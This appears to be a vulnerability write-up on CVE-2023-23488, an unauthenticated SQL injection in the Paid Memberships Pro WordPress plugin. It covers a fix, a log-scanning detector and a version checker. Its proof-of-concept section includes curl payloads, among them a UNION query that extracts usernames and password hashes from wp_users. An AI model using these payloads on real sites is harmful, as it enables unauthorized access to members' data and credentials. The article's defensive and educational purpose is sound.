In early 2023, a serious security flaw was found in the popular Paid Memberships Pro WordPress plugin. This flaw (tracked as CVE-2023-23488) could allow hackers to break into vulnerable websites and steal or manipulate database information without logging in. This article breaks down how the attack works, shows example code, and explains how you can protect your WordPress site.

What is Paid Memberships Pro?

Paid Memberships Pro is a well-known WordPress plugin for managing memberships, subscriptions, and paywalled content. Thousands of sites use it to handle user subscriptions and payments.

The Vulnerability: SQL Injection via the REST API

CVE-2023-23488 affects versions below 2.9.8. The root problem is an unauthenticated SQL injection in the code parameter when sending a request to the /pmpro/v1/order REST endpoint.

SQL injection is a vulnerability where an attacker tricks a website into running dangerous SQL (database) commands. In this case, anyone on the internet—even without a valid account—could potentially steal, modify, or even delete sensitive information from the database through this bug.

Official advisories:
- Wordfence: High Severity Unauthenticated SQL Injection in Paid Memberships Pro
- NVD Entry: CVE-2023-23488

How Does the Exploit Work?

The REST route accepted a parameter named code (sent via GET or POST). Its value was inserted directly into an SQL query without any sanitization or validation.

Technical Details

Here’s a simplified look at the vulnerable function (not the actual code, but conceptually similar):

// This is a general representation, not the real code
function get_order_by_code($code) {
    global $wpdb;
    // NOT SAFE: $code comes directly from user input!
    $query = "SELECT * FROM wp_pmpro_membership_orders WHERE code = '$code'";
    $order = $wpdb->get_row($query);
    return $order;
}

An attacker could send something like code=123' OR 1=1 -- - and the SQL would return all orders (or worse, if they inject more complex SQL).
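To make the fix concrete, here is an added example (written for this article, not Paid Memberships Pro's code) that puts the string-built query next to a parameterized one built with $wpdb->prepare(), and adds an allow-list validator in the shape register_rest_route() accepts for its args key. FakeWpdb is a stand-in for WordPress's $wpdb so the file runs on its own with the php CLI; the order-code format it validates (alphanumeric, at most 32 characters) is an assumption for the example, not the plugin's real format.

```php
<?php
// Added example, not code from the plugin. Contrasts the unsafe string-built
// query with a parameterized one, plus an allow-list check on the REST argument.

// Stand-in for WordPress's $wpdb so this runs outside WordPress.
// Real wpdb::prepare() escapes through the MySQL driver; only the shape matches.
class FakeWpdb {
    public string $prefix = 'wp_';
    public string $last_query = '';

    // Replace %s / %d placeholders: %s is escaped and quoted, %d is cast to int.
    public function prepare(string $query, ...$args): string {
        $i = 0;
        return preg_replace_callback('/%[sd]/', function (array $m) use ($args, &$i): string {
            $value = $args[$i++] ?? '';
            if ($m[0] === '%d') {
                return (string) (int) $value;
            }
            return "'" . addslashes((string) $value) . "'";
        }, $query);
    }

    // Records the SQL that would be sent to MySQL; there is no database here.
    public function get_row(string $query): ?array {
        $this->last_query = $query;
        return null;
    }
}

// The pattern CVE-2023-23488 describes: user input spliced into the SQL string.
function get_order_by_code_unsafe(FakeWpdb $wpdb, string $code): ?array {
    $table = $wpdb->prefix . 'pmpro_membership_orders';
    return $wpdb->get_row("SELECT * FROM $table WHERE code = '$code'");
}

// Hardened form: the value is bound as a parameter, so a quote cannot close the literal.
function get_order_by_code_safe(FakeWpdb $wpdb, string $code): ?array {
    $table = $wpdb->prefix . 'pmpro_membership_orders';
    $sql   = $wpdb->prepare("SELECT * FROM $table WHERE code = %s", $code);
    return $wpdb->get_row($sql);
}

// Defence in depth: reject anything that is not a plausible order code before it
// reaches SQL. The alphanumeric/max-32 rule is an assumption for this example.
function pmpro_example_code_is_valid($value): bool {
    return is_string($value) && preg_match('/^[A-Za-z0-9]{1,32}$/', $value) === 1;
}

// Argument definition in the shape register_rest_route() accepts under 'args'.
function pmpro_example_route_args(): array {
    return [
        'code' => [
            'required'          => true,
            'type'              => 'string',
            'validate_callback' => 'pmpro_example_code_is_valid',
            'sanitize_callback' => 'sanitize_text_field',
        ],
    ];
}

$wpdb    = new FakeWpdb();
$payload = "123' OR 1=1 -- -";   // the injection string from the write-up

get_order_by_code_unsafe($wpdb, $payload);
echo "unsafe: {$wpdb->last_query}\n";

get_order_by_code_safe($wpdb, $payload);
echo "safe:   {$wpdb->last_query}\n";

var_dump(pmpro_example_code_is_valid($payload));
var_dump(pmpro_example_code_is_valid('ABC123'));
```

Running it prints both SQL strings: in the unsafe one the injected quote closes the literal and OR 1=1 becomes live SQL, while in the prepared one the quote is escaped and the whole payload is just a string value that matches no row. The validator rejects the payload outright, so a hardened endpoint never builds that query at all.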

Proof of Concept (PoC) Exploit

To exploit this, hackers would send a POST or GET request to the REST route /wp-json/pmpro/v1/order?code= with a malicious value.

Here’s a proof-of-concept using curl (replace the URL with your target):

curl -s -X GET \
  "http://targetsite.com/wp-json/pmpro/v1/order?code=123'%20OR%201=1%20--%20-"

If the site is vulnerable, the database will treat the query as:

SELECT * FROM wp_pmpro_membership_orders WHERE code = '123' OR 1=1 -- -'

which returns *all orders* (or allows further manipulation or data theft).

You can leverage UNION-based SQL injection for data extraction. For example:

curl -s \
  "http://targetsite.com/wp-json/pmpro/v1/order?code=anything'%20UNION%20SELECT%20user_login,user_pass,1,1,1%20FROM%20wp_users--%20-"

*(Be careful: hacking unauthorized websites is illegal! This is for educational/research and testing on your own sites only!)*
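The requests above leave a recognisable footprint in web-server access logs. As an added detection example (written for this article, not the plugin's or the author's code), the script below reads combined-format log lines, scopes to the PMPro order route (both the /wp-json/ form and the /?rest_route= form), percent-decodes the code parameter and flags values containing quote or comment characters or SQL keywords. The log lines are constructed for the example; it needs PHP 8 for str_starts_with(). Note the caveat in the comments: POST bodies are not in access logs, so the POST variant of the request needs application or WAF logging to be seen.

```php
<?php
// Added example, not from the write-up's author or the plugin. Flags access-log
// lines that hit the PMPro order endpoint with SQL metacharacters in "code".
// Caveat: access logs only show the query string, so POST bodies need
// application-level or WAF logging instead.

const PMPRO_ORDER_PATH  = '/wp-json/pmpro/v1/order';
const PMPRO_ORDER_ROUTE = '/pmpro/v1/order';   // /?rest_route=... form of the same call

// Quote/comment characters and keywords that never belong in an order code.
const SQLI_PATTERN = '/[\'"#;]|--|\/\*|\b(?:OR|AND|UNION|SELECT)\b/i';

// Parse one common/combined log format line; returns null for anything else.
function parse_log_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4], 'status' => (int) $m[5]];
}

// Split the request target into its path and its percent-decoded query parameters.
function split_target(string $target): array {
    $path  = parse_url($target, PHP_URL_PATH);
    $query = parse_url($target, PHP_URL_QUERY);
    $params = [];
    if (is_string($query)) {
        parse_str($query, $params);   // parse_str also decodes %XX and '+'
    }
    return [is_string($path) ? $path : '', $params];
}

// True for both URL shapes WordPress accepts for this REST route.
function is_pmpro_order_request(string $path, array $params): bool {
    if (str_starts_with($path, PMPRO_ORDER_PATH)) {
        return true;
    }
    $route = $params['rest_route'] ?? '';
    return is_string($route) && str_starts_with($route, PMPRO_ORDER_ROUTE);
}

// One finding per line that targets the order route with a hostile "code" value.
function find_injection_attempts(array $lines): array {
    $findings = [];
    foreach ($lines as $line) {
        $entry = parse_log_line($line);
        if ($entry === null) {
            continue;
        }
        [$path, $params] = split_target($entry['target']);
        if (!is_pmpro_order_request($path, $params)) {
            continue;   // quotes in other routes are out of scope for this rule
        }
        $code = $params['code'] ?? null;
        if (is_string($code) && preg_match(SQLI_PATTERN, $code)) {
            $findings[] = ['ip' => $entry['ip'], 'time' => $entry['time'], 'code' => $code];
        }
    }
    return $findings;
}

// Constructed sample log: two attempts mirroring the PoC, one legitimate lookup,
// one rest_route-form attempt, and an unrelated route containing a quote.
$sample_log = [
    '203.0.113.7 - - [20/Jan/2023:18:15:01 +0000] "GET /wp-json/pmpro/v1/order?code=123\'%20OR%201=1%20--%20- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [20/Jan/2023:18:15:04 +0000] "GET /wp-json/pmpro/v1/order?code=x\'%20UNION%20SELECT%201,2,3,4,5--%20- HTTP/1.1" 200 2210',
    '198.51.100.2 - - [20/Jan/2023:18:16:10 +0000] "GET /wp-json/pmpro/v1/order?code=AB12CD34 HTTP/1.1" 200 640',
    '198.51.100.9 - - [20/Jan/2023:18:17:00 +0000] "GET /?rest_route=/pmpro/v1/order&code=1\'%23 HTTP/1.1" 200 610',
    '192.0.2.5 - - [20/Jan/2023:18:18:00 +0000] "GET /wp-json/wp/v2/posts?search=O\'Reilly HTTP/1.1" 200 9000',
];

foreach (find_injection_attempts($sample_log) as $f) {
    printf("%s  %-15s code=%s\n", $f['time'], $f['ip'], $f['code']);
}
```

On the sample above the first, second and fourth lines are reported and the other two are not: the legitimate order code has no metacharacters, and the quote in the posts search is outside the route this rule covers, which keeps the alert specific to the vulnerable endpoint.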

Impact

- High severity: no authentication is needed.
- Data exposure: attackers can access member information, payment history, admin credentials, and more.
- Data manipulation: possibly change, add, or remove data in the database.
- Full compromise: if combined with other bugs or by leaking password hashes, complete site takeover is possible.

How to Fix: Patch Your Plugin

Version 2.9.8 and above are safe!
You must upgrade Paid Memberships Pro immediately if you’re running a version below 2.9.8.

1. In your WordPress admin, find Paid Memberships Pro in the installed plugins list and click "Update Now".
2. Or download the latest version from WordPress.org.

How to Check If You're Vulnerable

1. Visit https://yoursite.com/wp-json/pmpro/v1/order?code=test'
2. If you see an error or unexpected data, you might still be vulnerable.

Alternatively, scan your site with a security tool like Wordfence or WPScan.
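The URL probe above can mislead in both directions (a WAF can mask the response, and a normal-looking response does not prove the fix is present), so the version the advisory keys on is the more reliable signal. As an added example (not the plugin's code), the script below reads the Version: header from a plugin's main file the way WordPress's own get_plugin_data() does, from the leading comment block in the first 8 KiB, and compares it against 2.9.8 with version_compare(). The sample header is constructed; the plugin file path you pass on the command line is an assumption about your install, not a path from the advisory.

```php
<?php
// Added example, not the plugin's code. Checks an installed plugin's version
// header against the fixed release (2.9.8) named in the advisory.

const PMPRO_FIXED_VERSION = '2.9.8';

// Extract "Version: x.y.z" from a plugin header block. The regex follows the
// shape WordPress uses for file headers (leading comment punctuation allowed).
function read_plugin_version_from_header(string $header_text): ?string {
    $chunk = substr($header_text, 0, 8192);   // WordPress reads only the first 8 KiB
    if (preg_match('/^[ \t\/*#@]*Version:\s*(.+)$/mi', $chunk, $m)) {
        return trim($m[1]);
    }
    return null;
}

// Unknown version is reported as vulnerable rather than silently passing.
function pmpro_is_vulnerable_version(?string $version): bool {
    if ($version === null) {
        return true;
    }
    return version_compare($version, PMPRO_FIXED_VERSION, '<');
}

// Read a real plugin file (assumed path supplied by the caller) and evaluate it.
function check_plugin_file(string $path): array {
    $text    = @file_get_contents($path, false, null, 0, 8192);
    $version = $text === false ? null : read_plugin_version_from_header($text);
    return ['version' => $version, 'vulnerable' => pmpro_is_vulnerable_version($version)];
}

// Constructed sample header standing in for the plugin's main file.
$sample_header = <<<'HEADER'
<?php
/**
 * Plugin Name: Paid Memberships Pro
 * Version: 2.9.7
 */
HEADER;

if ($argc > 1) {
    // e.g. php check.php /var/www/html/wp-content/plugins/<plugin-dir>/<main-file>.php
    $result = check_plugin_file($argv[1]);
} else {
    $version = read_plugin_version_from_header($sample_header);
    $result  = ['version' => $version, 'vulnerable' => pmpro_is_vulnerable_version($version)];
}

printf("version: %s  vulnerable: %s\n",
    $result['version'] ?? 'unknown',
    $result['vulnerable'] ? 'yes (below ' . PMPRO_FIXED_VERSION . ')' : 'no');
```

With no argument it evaluates the constructed 2.9.7 header and reports it as vulnerable; pointing it at a patched install reports no. Treating a missing or unreadable header as vulnerable is deliberate, so a renamed or partially deleted plugin directory does not produce a false all-clear.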

Conclusion

CVE-2023-23488 is a critical, real-world example of why input validation and sanitization matter. Always keep your WordPress plugins—especially those involving user accounts and payments—up to date. If you need more details or help, check the references below.

References

- Wordfence Research on CVE-2023-23488
- National Vulnerability Database Entry (NVD)
- Vendor Changelog
- WPScan Vulnerability Report


If you found this helpful, make sure to patch all your sites and share this with others using Paid Memberships Pro!

Timeline

Published on: 01/20/2023 18:15:00 UTC
Last modified on: 04/03/2023 20:15:00 UTC